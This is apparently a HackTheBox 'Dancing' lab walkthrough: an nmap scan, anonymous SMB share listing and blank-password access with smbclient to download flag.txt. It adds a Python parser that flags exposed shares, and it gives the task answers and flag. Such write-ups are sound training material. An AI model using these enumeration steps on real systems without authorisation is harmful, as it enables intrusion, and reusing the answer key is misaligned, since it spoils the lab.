Dancing Starting Point HackTheBox Walkthrough/Writeup

protonsec
3 min read, Jul 25, 2022

Dancing is a very impressive challenge by HackTheBox for practicing hacking skills. If you want a video solution, watch the following video for the English version:

And for the Hindi version (in Hindi):

Now let’s continue our writeup.

Fire up the terminal and scan the target like this:

wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 11:21 IST
Nmap scan report for target_ip
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 93.25 seconds

From the scan results we get some valuable information:

PORT    STATE SERVICE       VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Now, a simple Google search brings us to the answer for

TASK 1: What does the 3-letter acronym SMB stand for?
Server Message Block

From our scan results we can see that microsoft-ds is running on port 445.

TASK 2: What port does SMB use to operate at?
445

The scan result shows the service name.

TASK 3: What is the service name for port 445 that came up in our Nmap scan?
microsoft-ds

To list the shares on the target, the -L flag is used with the SMB tool (smbclient).

TASK 4: What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?
-L

Now let’s use smbclient to connect to SMB:

wesecure1337@kali:~$ smbclient -L //{target_ip}
Password for [WORKGROUP\wesecure1337]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
WorkShares Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.149.40 failed (Error NT_STATUS_RESOURCE_NAME_
Unable to connect with SMB1 -- no workgroup available

When prompted for a password, just press Enter; it will list the shares.

Now we have the share names. After trying to connect to each share, only WorkShares is accessible with a blank password:

wesecure1337@kali:~$ smbclient //10.129.149.40/WorkShares
Password for [WORKGROUP\naveen]:
Try "help" to get a list of possible commands.
smb: \>

This brings us to

TASK 5: What is the name of the share we are able to access in the end with a blank password?
WorkShares
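As an added example (not part of the original writeup), here is a small Python parser that turns the `smbclient -L` output shown above into structured data and flags the non-administrative disk shares that were enumerated without credentials, which is the kind of check a defender would automate when auditing hosts for shares reachable with a blank password. The sample listing below is constructed to match the session above; the `Share` class and function names are my own.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample, shaped like the `smbclient -L` session in the writeup.
SAMPLE_LISTING = """\
Password for [WORKGROUP\\wesecure1337]:

\tSharename       Type      Comment
\t---------       ----      -------
\tADMIN$          Disk      Remote Admin
\tC$              Disk      Default share
\tIPC$            IPC       Remote IPC
\tWorkShares      Disk
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
"""


@dataclass(frozen=True)
class Share:
    name: str
    kind: str      # Disk, IPC or Printer, as printed by smbclient
    comment: str

    @property
    def is_admin(self) -> bool:
        # ADMIN$, C$ and IPC$ are Windows default administrative shares;
        # the trailing '$' marks them as hidden.
        return self.name.endswith("$")


# One table row: name, type keyword, optional free-text comment.
SHARE_LINE = re.compile(r"^\s*(\S+)\s+(Disk|IPC|Printer)\b\s*(.*)$")


def parse_share_list(text: str) -> list[Share]:
    """Parse the share table printed by `smbclient -L` into Share objects."""
    shares: list[Share] = []
    in_table = False
    for line in text.splitlines():
        if line.strip().startswith("Sharename"):
            in_table = True          # header row: the table starts here
            continue
        if not in_table or line.strip().startswith("---"):
            continue
        match = SHARE_LINE.match(line)
        if not match:
            if shares:               # first non-row line ends the table
                break
            continue
        shares.append(Share(match.group(1), match.group(2), match.group(3).strip()))
    return shares


def exposed_shares(text: str) -> list[str]:
    """Names of non-administrative disk shares listed without credentials."""
    return [s.name for s in parse_share_list(text) if s.kind == "Disk" and not s.is_admin]
```

On this box the only finding is WorkShares; a hardened host would refuse the unauthenticated listing altogether, so an empty result from an anonymous `smbclient -L` is the state to aim for.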

Let’s dig into what is inside:

smb: \> ls
. D 0 Mon Mar 29 13:52:01 2021
.. D 0 Mon Mar 29 13:52:01 2021
Amy.J D 0 Mon Mar 29 14:38:24 2021
James.P D 0 Thu Jun 3 14:08:03 2021
5114111 blocks of size 4096. 1753130 blocks available
smb: \> cd James.P
smb: \James.P\>
smb: \James.P\> ls
. D 0 Thu Jun 3 14:08:03 2021
.. D 0 Thu Jun 3 14:08:03 2021
flag.txt A 32 Mon Mar 29 14:56:57 2021
5114111 blocks of size 4096. 1752618 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \James.P\>exit
wesecure1337@kali:~$ ls
flag.txt
wesecure1337@kali:~$ cat flag.txt
5f61c10dffbc77a704d76016a22f1664

Here the get command is used to download the flag.txt file to our local machine.

Now

TASK 6: What is the command we can use within the SMB shell to download the files we find?
get

And finally, submit the flag to complete the challenge.

SUBMIT FLAG: Submit root flag
5f61c10dffbc77a704d76016a22f1664

Voila! We have completed the Dancing challenge by HackTheBox. If you really enjoyed the writeup, do check out our other writeups [Walkthrough].

Let’s get connected

Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec

If you want to appreciate and support my work here you go…

Thanks for Reading!!!
